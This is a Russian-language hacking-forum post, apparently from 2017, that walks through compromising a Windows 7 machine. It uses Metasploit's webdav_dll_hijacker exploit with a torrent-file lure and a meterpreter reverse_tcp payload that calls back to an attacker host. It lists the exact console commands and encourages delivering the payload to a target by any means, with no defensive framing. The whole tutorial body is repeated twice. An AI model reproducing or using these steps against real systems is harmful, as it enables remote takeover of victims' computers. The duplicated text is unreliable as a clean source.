Vander
18.04.2017, 22:47
Всем привет! В этой теме я хочу рассмотреть способ получения активной сессии meterpreter с помощью выполнения вредоносного кода содержащегося в файле, типа torrent.
https://forum.antichat.xyz/attachments/4776487/img_c63e7677be.png
С этой задачей нам поможет справиться Kali Linux 2016.2 Rolling и наличие обновленного Metasploit Framework. В качестве целевого хоста, я буду использовать десктоп с установленной Windows 7.
https://forum.antichat.xyz/attachments/4776487/img_578aadc24d.png
Итак, запустив Metasploit, вводим следующее:
> use exploit/windows/browser/webdav_dll_hijacker (Выбираем эксплоит)
> msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp (Выбираем тип полезной нагрузки)
> set lhost 192.168.0.104 (Определим адрес атакующего хоста)
> set extensions torrent(Выберем тип расширения файла)
> exploit(Запустим работу фреймворка)
https://forum.antichat.xyz/attachments/4776487/img_1dbfd46426.png
Далее, запускается веб-сервер, на атакующем хосте, а по адресу 192.168.0.104\documents\ - будет находиться полезная нагрузка, наша задача состоит в том, чтобы используя всевозможные методы доставить ее на целевой хост.
https://forum.antichat.xyz/attachments/4776487/img_0dedc5c68a.png
Откроем на целевом хосте строку “Выполнить” и впишем туда адрес, по которому находится полезная нагрузка:
https://forum.antichat.xyz/attachments/4776487/img_917f5cc550.png
В консоли атакующего хоста видим сигнализационные сообщения:
https://forum.antichat.xyz/attachments/4776487/img_f4de70a83a.png
Затем, в открывшемся окне на целевом хосте можно наблюдать сгенерированный Metasploit торрент-файл:
https://forum.antichat.xyz/attachments/4776487/img_f95a8eade3.png
После его запуска, откроется активная сессия meterpreter:
https://forum.antichat.xyz/attachments/4776487/img_2324a9dfb6.png
Проверим ее:
https://forum.antichat.xyz/attachments/4776487/img_ffbd738868.png
В опциях эксплойта, можно изменить директорию и название полезной нагрузки:
https://forum.antichat.xyz/attachments/4776487/img_59ddb35f37.png
При попытке применить эксплоит к Windows 8.1:
https://forum.antichat.xyz/attachments/4776487/img_bbe04a8b3b.png
Так же реагирует и Windows 10, полагаю дело в обновлении, которое закрыло критические уязвимости в Windows.
На этом пожалуй, все, спасибо за внимание.
https://forum.antichat.xyz/attachments/4776487/img_c63e7677be.png
С этой задачей нам поможет справиться Kali Linux 2016.2 Rolling и наличие обновленного Metasploit Framework. В качестве целевого хоста, я буду использовать десктоп с установленной Windows 7.
https://forum.antichat.xyz/attachments/4776487/img_578aadc24d.png
Итак, запустив Metasploit, вводим следующее:
> use exploit/windows/browser/webdav_dll_hijacker (Выбираем эксплоит)
> msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp (Выбираем тип полезной нагрузки)
> set lhost 192.168.0.104 (Определим адрес атакующего хоста)
> set extensions torrent(Выберем тип расширения файла)
> exploit(Запустим работу фреймворка)
https://forum.antichat.xyz/attachments/4776487/img_1dbfd46426.png
Далее, запускается веб-сервер, на атакующем хосте, а по адресу 192.168.0.104\documents\ - будет находиться полезная нагрузка, наша задача состоит в том, чтобы используя всевозможные методы доставить ее на целевой хост.
https://forum.antichat.xyz/attachments/4776487/img_0dedc5c68a.png
Откроем на целевом хосте строку “Выполнить” и впишем туда адрес, по которому находится полезная нагрузка:
https://forum.antichat.xyz/attachments/4776487/img_917f5cc550.png
В консоли атакующего хоста видим сигнализационные сообщения:
https://forum.antichat.xyz/attachments/4776487/img_f4de70a83a.png
Затем, в открывшемся окне на целевом хосте можно наблюдать сгенерированный Metasploit торрент-файл:
https://forum.antichat.xyz/attachments/4776487/img_f95a8eade3.png
После его запуска, откроется активная сессия meterpreter:
https://forum.antichat.xyz/attachments/4776487/img_2324a9dfb6.png
Проверим ее:
https://forum.antichat.xyz/attachments/4776487/img_ffbd738868.png
В опциях эксплойта, можно изменить директорию и название полезной нагрузки:
https://forum.antichat.xyz/attachments/4776487/img_59ddb35f37.png
При попытке применить эксплоит к Windows 8.1:
https://forum.antichat.xyz/attachments/4776487/img_bbe04a8b3b.png
Так же реагирует и Windows 10, полагаю дело в обновлении, которое закрыло критические уязвимости в Windows.
На этом пожалуй, все, спасибо за внимание.